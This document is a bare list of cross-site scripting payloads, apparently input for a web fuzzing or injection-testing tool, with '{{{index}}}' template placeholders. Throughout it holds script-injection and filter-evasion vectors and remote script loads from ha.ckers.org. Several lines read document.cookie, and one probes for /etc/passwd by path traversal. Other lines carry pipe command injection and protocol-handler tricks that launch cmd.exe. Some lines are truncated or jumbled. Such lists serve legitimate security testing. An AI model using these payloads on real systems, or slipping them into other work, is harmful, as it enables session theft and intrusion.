alert("{{{index}}} " + 'xss');
<img src="adsdasda">
';alert("{{{index}}} " + String.fromCharCode(88,83,83))//\';alert("{{{index}}} " + String.fromCharCode(88,83,83))//";alert("{{{index}}} " + String.fromCharCode(88,83,83))//\";alert("{{{index}}} " + String.fromCharCode<script>alert("{{{index}}} " + 'xss')</script>
//--></SCRIPT>">'><SCRIPT>alert("{{{index}}} " + String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert("{{{index}}} " + 'XSS');">
<IMG SRC=javascript:alert("{{{index}}} " + 'XSS')>
<IMG SRC=javascrscriptipt:alert("{{{index}}} " + 'XSS')>
<IMG SRC=JaVaScRiPt:alert("{{{index}}} " + 'XSS')>
<IMG """><SCRIPT>alert("{{{index}}} " + "XSS")</SCRIPT>">
<IMG SRC=" &#14;  javascript:alert("{{{index}}} " + 'XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("{{{index}}} " + "XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert("{{{index}}} " + a.source)</SCRIPT>
\";alert("{{{index}}} " + 'XSS');//
</TITLE><SCRIPT>alert("{{{index}}} " + "XSS");</SCRIPT>
<TABLE><TD BACKGROUND="javascript:alert("{{{index}}} " + 'XSS')">
<DIV STYLE="background-image: url(javascript:alert("{{{index}}} " + 'XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert("{{{index}}} " + 'XSS'));">
<SCRIPT>alert("{{{index}}} " + 'XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert("{{{index}}} " + 'XSS');">
<IMG SRC=javascript:alert("{{{index}}} " + 'XSS')>
<IMG SRC=JaVaScRiPt:alert("{{{index}}} " + 'XSS')>
<IMG SRC=javascript:alert("{{{index}}} " + &quot;XSS&quot;)>
<IMG SRC=`javascript:alert("{{{index}}} " + "RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert("{{{index}}} " + String.fromCharCode(88,83,83))>
SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav	ascript:alert("{{{index}}} " + 'XSS');">
<IMG SRC="jav&#x09;ascript:alert("{{{index}}} " + 'XSS');">
<IMG SRC="jav&#x0A;ascript:alert("{{{index}}} " + 'XSS');">
<IMG SRC="jav&#x0D;ascript:alert("{{{index}}} " + 'XSS');">
<IMG SRC=" &#14;  javascript:alert("{{{index}}} " + 'XSS');">
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
<IMG SRC=java%00script:alert("{{{index}}} " + \"XSS\")>
<SCR%00IPT>alert("{{{index}}} " + \"XSS\")</SCR%00IPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<IMG SRC="javascript:alert("{{{index}}} " + 'XSS')"
<SCRIPT>a=/XSS/
\";alert("{{{index}}} " + 'XSS');//
<INPUT TYPE="IMAGE" SRC="javascript:alert("{{{index}}} " + 'XSS');">
<BODY BACKGROUND="javascript:alert("{{{index}}} " + 'XSS')">
<BODY ONLOAD=alert("{{{index}}} " + 'XSS')>
<IMG DYNSRC="javascript:alert("{{{index}}} " + 'XSS')">
<IMG LOWSRC="javascript:alert("{{{index}}} " + 'XSS')">
<BGSOUND SRC="javascript:alert("{{{index}}} " + 'XSS');">
<BR SIZE="&{alert("{{{index}}} " + 'XSS')}">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert("{{{index}}} " + 'XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("{{{index}}} " + 'XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="Link" Content="<javascript:alert("{{{index}}} " + 'XSS')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert("{{{index}}} " + 'XSS');">
<IFRAME SRC="javascript:alert("{{{index}}} " + 'XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert("{{{index}}} " + 'XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert("{{{index}}} " + 'XSS')">
<DIV STYLE="background-image: url(javascript:alert("{{{index}}} " + 'XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert("{{{index}}} " + 'XSS'))">
<DIV STYLE="width: expression(alert("{{{index}}} " + 'XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("{{{index}}} " + "XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert("{{{index}}} " + 'XSS'))">
<XSS STYLE="xss:expression(alert("{{{index}}} " + 'XSS'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">alert("{{{index}}} " + 'XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert("{{{index}}} " + 'XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert("{{{index}}} " + 'XSS')")}</STYLE>
<BASE HREF="javascript:alert("{{{index}}} " + 'XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert("{{{index}}} " + 'XSS')></OBJECT>
getURL("javascript:alert("{{{index}}} " + 'XSS')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert("{{{index}}} " + 'XSS');">
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert("{{{index}}} " + 'XSS')&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert("{{{index}}} " + 'XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
firefoxurl:test|"%20-new-window%20javascript:alert("{{{index}}} " + \'Cross%2520Browser%2520Scripting!\');"
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert("{{{index}}} " + process)
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("{{{index}}} " + "XSS"))'>
';alert("{{{index}}} " + String.fromCharCode(88,83,83))//';alert("{{{index}}} " + String.fromCharCode(88,83,83))//";
alert("{{{index}}} " + String.fromCharCode(88,83,83))//";alert("{{{index}}} " + String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert("{{{index}}} " + String.fromCharCode(88,83,83))</SCRIPT>
<a onmouseover="alert("{{{index}}} " + document.cookie)">xxs link</a>
>"><script>alert("{{{index}}} " + "XSS")</script>&
"><STYLE>@import"javascript:alert("{{{index}}} " + 'XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
 alert("{{{index}}} " + %26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
>%22%27><img%20src%3d%22javascript:alert("{{{index}}} " + %27%20XSS%27)%22>
'%uff1cscript%uff1ealert("{{{index}}} " + 'XSS')%uff1c/script%uff1e'
">
>"
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert("{{{index}}} " + 'XSS');">
<IMG SRC=javascript:alert("{{{index}}} " + 'XSS')>
<IMG SRC=JaVaScRiPt:alert("{{{index}}} " + 'XSS')>
<IMG SRC=JaVaScRiPt:alert("{{{index}}} " + &quot;XSS<WBR>&quot;)>
<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;
 &#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058
 &<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28
 &<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav&#x09;ascript:alert("{{{index}}} " + <WBR>'XSS');">
<IMG SRC="jav&#x0A;ascript:alert("{{{index}}} " + <WBR>'XSS');">
<IMG SRC="jav&#x0D;ascript:alert("{{{index}}} " + <WBR>'XSS');">
'eGFiY0RjYkE',
'yahoo%20-eGFiY0RjYkE',
'yahoo%20-eGFiY0RjYkE',
'<xss>',
'yahoo%20-<xss>',
'yahooo%20-<xss>',
base64_encode('<xss>'),
'%3Cxss%3E%253Cxss%253E',
'xabcD%22cbA',
'&lt;xss&#060xss&#x3cxss&#X3c;xss\x3cxss\u003cxss',
'"onmouseover="alert("{{{index}}} " + document.cookie)"a="',
"'onmouseover='alert("{{{index}}} " + document.cookie)'a='",
'=>'%20onmouseover=alert("{{{index}}} " + document.cookie)',
22%20onmouseover=javascript:alert("{{{index}}} " + document.cookie)%20%22',
2BADw-xss%2BAF8-check%2BAD4-',
'http://rd.example.com',
'a%26b=def',
'../../../../../../../../etc/passwd%00',
'|man',
'javascript:alert("{{{index}}} " + 0)',
'');alert("{{{index}}} " + 0);//',
'%26%2339;-alert("{{{index}}} " + 0)//',
'%22);alert("{{{index}}} " + 0);//',
');alert("{{{index}}} " + 0);//',
'%E0',
'%00<xss>',
oo%27%2Balert%28%27xss%27%29%2F%2F',
oo%22%2Balert%28%22xss%22%29%2F%2F',
255C%255C%2527%252Balert%25281%2529%253B%252F%252F',
'%0d%0a%0d%0a%3Cscript%3Ealert("{{{index}}} " + document.cookie);%3C/script%3E',
'alert("{{{index}}} " + 0);',
'%253C%2522xss%2527%253E',
'%3Cscript%3Ea%3D%2FXSS%2F%0Aalert%28a.source%29%3C%2Fscript%3E',
'';!--"%3CXSS%3E=&{()}',
'%22%3E%3Cscript%3Ealert("{{{index}}} " + %22xss%22);%3C%2Fscript%3E',
'yahoo%20-%22%3E%3Cscript%3Ealert("{{{index}}} " + %22xss%22)%3C%2Fscript%3E',
'yahooo%20-%22%3E%3Cscript%3Ealert("{{{index}}} " + %22xss%22)%3C%2Fscript%3E',
'yahooo%20%3Cscript%3Ealert("{{{index}}} " + %22xss%22);%3C%2Fscript%3E',
' => '',